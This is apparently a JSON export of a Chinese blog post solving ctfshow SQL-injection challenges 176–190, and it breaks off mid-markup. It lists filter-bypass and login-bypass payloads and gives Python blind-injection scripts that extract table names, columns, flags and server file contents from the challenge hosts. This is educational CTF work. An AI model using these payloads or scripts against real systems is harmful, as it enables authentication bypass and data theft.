{"id":78,"date":"2026-05-11T22:11:27","date_gmt":"2026-05-11T14:11:27","guid":{"rendered":"https:\/\/mdhei.xyz\/?p=78"},"modified":"2026-05-24T14:01:37","modified_gmt":"2026-05-24T06:01:37","slug":"ctfshow-web%e5%85%a5%e9%97%a8-sql%e6%b3%a8%e5%85%a5176","status":"publish","type":"post","link":"https:\/\/mdhei.xyz\/index.php\/2026\/05\/11\/ctfshow-web%e5%85%a5%e9%97%a8-sql%e6%b3%a8%e5%85%a5176\/","title":{"rendered":"ctfshow web\u5165\u95e8 sql\u6ce8\u5165"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">176 \u5927\u5c0f\u5199\u7ed5\u8fc7\uff0cselect\u6539\u4e3aSelect<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">177\u7a7a\u683c\u7ed5\u8fc7 \u6539\u4e3a\/**\/\uff08\u6ce8\u91ca\u7b26\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">178\u7a7a\u683c\u7ed5\u8fc7 \u6539\u4e3a%09 \uff08tab\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">179\u7a7a\u683c\u7ed5\u8fc7 \u6539\u4e3a%0c \uff08\u6362\u9875\u7b26FF\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">180\u7a7a\u683c\u7ed5\u8fc7 \u6ce8\u91ca\u7b26\u53f7\u6539\u4e3a&#8211;%0c\uff08\u539f\u6765\u662f&#8211;[\u7a7a\u683c]\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">181\u4e07\u80fd\u5bc6\u78011\u2018%0cOR%0c1&#8211;%0c \u6216 1\u2019%0cOR%0cusername=&#8217;flag<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u62fc\u63a5\u5230\u539f\u8bed\u53e5\u5c31\u662f(username !=&#8217;flag&#8217; and id=&#8217;0&#8242;) OR (username=&#8217;flag&#8217;) \u56e0\u4e3aand\u7684\u4f18\u5148\u7ea7\u5927\u4e8eor\u6240\u4ee5username !=&#8217;flag&#8217; and id=&#8217;0&#8217;\u662f\u4e00\u7ec4\uff0c\u8fd9\u6837\u9010\u884c\u5224\u65ad\u65f6\uff0c\u5f53username = \u2018flag\u2019 \u65f6\uff0c\u6761\u4ef6\u4e3a\u771f\uff0c\u8fd4\u56de\u67e5\u8be2\u7ed3\u679c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">182 0&#8217;%0cor%0cusername%0clike&#8217;f% (like &#8216;f%&#8217; \u5339\u914df+\u4efb\u610f\u5b57\u7b26\uff0c\u4f8b\u5982fa\uff0cfl\uff0cflag\uff09<br><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">185-186<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6570\u5b570-9\u88abban\u4e86<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8003\u8651\u7528sql\u4e2d1\u53ef\u4ee5\u7528true\u8868\u793a\uff0c0\u53ef\u4ee5false\u8868\u793a\uff0c\u4f8b\u5982\uff08true+ture\uff09= 2<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u811a\u672c\u5982\u4e0b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">import requests<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">url = &#8220;http:\/\/1947e01e-3a40-49e7-9bbe-6da9a980ac8c.challenge.ctf.show\/select-waf.php&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">flag = &#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">aflag = &#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">str1 = &#8216;{0123456789-qwertyuiopasdfghjklzxcvbnm}&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">zd = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;0&#8217; : &#8216;false,&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;1&#8217; : &#8216;true,&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;2&#8217; : &#8216;(true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;3&#8217; : &#8216;(true+true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;4&#8217; : &#8216;(true+true+true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;5&#8217; : &#8216;(true+true+true+true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;6&#8217; : &#8216;(true+true+true+true+true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;7&#8217; : &#8216;(true+true+true+true+true+true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;8&#8217; : &#8216;(true+true+true+true+true+true+true+true),&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &#8216;9&#8217; : &#8216;(true+true+true+true+true+true+true+true+true),&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u6570\u5b57\u5bf9\u5e94ture\u7684\u5b57\u5178<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">for x in range(50):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; for i in str1:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u5faa\u73af\u5b57\u7b26\u5217\u8868<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; kong = &#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; for c in str(ord(i)):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u628ai\u8f6c\u4e3aord\u518d\u8f6cstr\uff0c\u4f8b\u5982\u2018{&#8216;-&gt;123-&gt;&#8217;123&#8217;,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; kong += zd[c]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u4e0a\u9762\u4e3a\u4f8b\uff0c\u5373kong\u4e09\u6b21\u62fc\u63a5\uff0c\u7ed3\u679c\u4e3a\uff1a&#8217;true,(true,true),(true,true,true),&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; kong = &#8216;char(&#8216;+&#8217;concat(&#8216;+kong[:-1]+&#8217;)),&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u505a\u4e00\u6b21\u62fc\u63a5\uff0c\u8fd9\u91cc\u7684char\u548cconcat\u90fd\u662fsql\u91cc\u7684\u51fd\u6570\uff0c\u7ed3\u679c\u4e3achar(concat(ture,(true,true),(true,true,true))) , (\u8fd9\u91cc\u5bf9kong\u7684\u5207\u7247\u64cd\u4f5c\u662f\u4e3a\u4e86\u5220\u6389\u539f\u6765\u672b\u5c3e\u7684\u9017\u53f7\uff09\uff0c\u8fd9\u6837\u5728\u67e5\u8be2\u8bed\u53e5\u4e2d\u5c31\u88ab\u89e3\u6790\u4e3achar(concat(1,2,3))<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">-&gt;char(123)-&gt;'{&#8216;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; data = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&#8216;tableName&#8217; : &#8216;ctfshow_user group by pass having pass regexp(concat({}))&#8217;.format(aflag+kong[:-1])<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u7b2c\u4e8c\u6b21\u5207\u7247\u662f\u4e3a\u4e86\u5220\u53bb\u672b\u5c3e\u7684\u9017\u53f7\uff0c\u548c\u4e0a\u9762\u4e0d\u540c\uff0c\u8fd9\u91cc\u5220\u53bb\u7684\u662f\u539f\u672c&#8217;)),&#8217;\u7684\u9017\u53f7\uff0c\u8fd9\u91cc\u7684concat\u662f\u4e3a\u4e86\u627e\u5230\u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e4b\u540e\uff0c\u518d\u628a\u540e\u9762\u7684\u5b57\u7b26\u518d\u62fc\u59d0\u4e00\u6b21\uff0c\u4f8b\u5982concat(char(123),char(99))-&gt;concat(&#8216;{&#8216;,&#8217;c&#8217;)-&gt;'{c&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; r = requests.post(url,data = data)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; if r.text.find(&#8216;$user_count = 1;&#8217;) &gt; 0:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; flag += i<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; aflag += kong<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u5982\u679c\u8fd4\u56de\u4e86count=1\uff0cflag\u5c31\u62fc\u4e0a\u5bf9\u5e94\u7684\u5b57\u7b26\uff0caflag\u62fc\u4e0a\u5f53\u524d\u7684\u7a7a\uff0c\u7ee7\u7eed\u4e0b\u4e00\u8f6e\u5bfb\u627e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print(flag)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if i == &#8216;}&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; exit()<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">#\u627e\u5230\u672b\u5c3e\u2019}\u2018\uff0c\u5c31\u7ed3\u675f\u7a0b\u5e8f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; continue<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">187 \u4e07\u80fd\u5bc6\u7801ffifdyop md5(xxx,true)\u88ab\u8bbe\u7f6e\u4e3atrue\u8fd4\u56de\u7684\u662f\u539f\u59cb16\u5b57\u82822\u8fdb\u5236\u6570\u636e\uff0c\u800c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">md5(ffifdyop,true) =&gt; &#8216;or&#8217;6\\xc9]\\x99\\xe9!r,\\xf9\\xedb\\x1c&#8221;  or\u540e\u7684\u5b57\u7b26\u4e32\u975e0\u975e\u7a7a\uff0c\u503c\u4e3a\u771f\uff0c\u6210\u529f\u767b\u5f55<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">188 username=0 &amp; password=0<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u8be2\u8bed\u53e5\u4e2dusername\u548c0\u6bd4\u8f83\uff0c\u800c\u4e0d\u4ee5\u6570\u5b57\u5f00\u5934\u7684\u5b57\u7b26\u4e32\u5728\u5f31\u6bd4\u8f83\u65f6\u4f1a\u8f6c\u62100\uff0c\u6761\u4ef6\u5c31\u4e3a\u771f\uff0c\u8fd4\u56de\u67e5\u8be2\u8bed\u53e5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">189\uff0c\u6839\u636e\u4e0a\u9898\u7684\u7ecf\u9a8c\uff0cusername\u5b57\u6bb5\u7684\u6570\u636e\u7c7b\u578b\u662f\u5b57\u7b26\u4e32\uff0c\u90a3\u4e48username = 0 \u4f1a\u8fd4\u56de\u67e5\u8be2\u7684\u7ed3\u679c\uff0c\u9875\u9762\u56de\u663e\u662f\u201c\u5bc6\u7801\u9519\u8bef\u201d\uff0c\u800cusername = 1\uff0c\u6d4b\u8bd5\u540e\u53d1\u73b0\u8fd4\u56de\u7684\u662f\u201c\u67e5\u8be2\u5931\u8d25\u201d\uff0c\u8bf4\u660e\u6ca1\u6709\u6ee1\u8db3=1\u7684username\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u6709\u53ef\u4ee5\u6839\u636e\u4e0d\u540c\u7684\u56de\u663e\u7ed3\u679c\u6765\u8fdb\u884c\u7206\u7834\uff0c\u811a\u672c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">import requests<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">url = &#8220;http:\/\/f6b633a4-f791-42e5-a849-a640fdf9a18d.challenge.ctf.show\/api\/&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">def getp():<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; head = 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; tail = 300<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; while head&lt;tail:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;mid = (tail+head) &gt;&gt; 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;username&#8217; : &#8220;if(locate(&#8216;ctfshow{&#8216;,&#8221;+&#8221;load_file(&#8216;\/var\/www\/html\/api\/index.php&#8217;))&gt;{0},0,1)&#8221;.format(str(mid)),<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;password&#8217; : &#8216;0&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.post(url = url,data = data)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if r.json()[&#8216;msg&#8217;] == &#8216;\u5bc6\u7801\u9519\u8bef&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; head = mid + 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tail = mid<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; return head &nbsp; &nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">def getflag(num):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; i = int(num)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; result =&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; while 1: &nbsp; &nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; head = 32<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; tail = 127<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; while head &lt; tail:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mid = (head + tail) &gt;&gt; 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;username&#8217; : &#8216;if(ascii(substr(load_file(&#8220;\/var\/www\/html\/api\/index.php&#8221;),{0},1))&gt;{1},0,1)&#8217;.format(i,mid),<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;password&#8217; : &#8216;0&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; r = requests.post(url = url, data = data)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if r.json()[&#8216;msg&#8217;] == &#8216;\u5bc6\u7801\u9519\u8bef&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; head = mid + 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tail = mid<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; i+=1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; if(chr(head) != &#8216;}&#8217;):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result += chr(head)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print(result)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; return result+&#8217;}&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if __name__ == &#8216;__main__&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; num = getp()<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; print(getflag(num))<\/p>\n\n\n\n<h2 id=\"190\" class=\"wp-block-heading\">190<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">import requests<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">url=&#8217;http:\/\/04b5ef7e-39a9-445e-abfe-6c8db49edf64.challenge.ctf.show\/api\/&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">def gettable():<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; table=&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; for i in range(1,13):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; head = 32<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; tail = 127<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; while head &lt; tail:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mid = (head+tail) &gt;&gt; 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;username&#8217;: &#8220;admin&#8217; and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),{0},1)) &gt; {1},1,0)#&#8221;.format(i,mid)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ,&#8217;password&#8217;:&#8217;1&#8242;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; r = requests.post(url = url,data = data)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if r.json()[&#8216;msg&#8217;] == &#8216;\u5bc6\u7801\u9519\u8bef&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; head = mid+1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tail = mid<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; table+=chr(head)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; print(table)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; return table<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">def getcolumn(table_name):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; column = &#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; for i in range(1, 50):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; head = 32<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; tail = 127<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; while head &lt; tail:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mid = (head + tail) &gt;&gt; 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;username&#8217;: &#8220;admin&#8217; and if(ascii(substr((select column_name from information_schema.columns where table_name='{0}&#8217; limit 1,1),{1},1))&gt;{2},1,0)#&#8221;.format(table_name, i, mid),<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;password&#8217;: &#8216;1&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; r = requests.post(url=url, data=data)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if r.json()[&#8216;msg&#8217;] == &#8216;\u5bc6\u7801\u9519\u8bef&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; head = mid + 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tail = mid<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; if head != 32:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; column += chr(head)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print(column)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; return column<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">def getflag(table_name,column_name):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; table_name = str(table_name)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; column_name = str(column_name)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; flag = &#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; for i in range(1,50):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; head = 32<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; tail = 127<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; while head &lt; tail:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mid = (head + tail) &gt;&gt; 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data = {<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#8216;username&#8217; : &#8220;admin&#8217; and if(ascii(substr((select {0} from {1} limit 0,1),{2},1))&gt;{3},1,0)#&#8221;.format(column_name,table_name,i,mid)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ,&#8217;password&#8217; : &#8216;1&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; r = requests.post(url = url,data = data)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if r.json()[&#8216;msg&#8217;] == &#8220;\u5bc6\u7801\u9519\u8bef&#8221;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; head = mid + 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tail = mid<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; if(head != 32):<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; flag+=chr(head)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print(flag)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; else:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; return flag<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if __name__ == &#8216;__main__&#8217;:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; table_name=gettable()<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; print(table_name)<\/p>\n\n\n\n<p 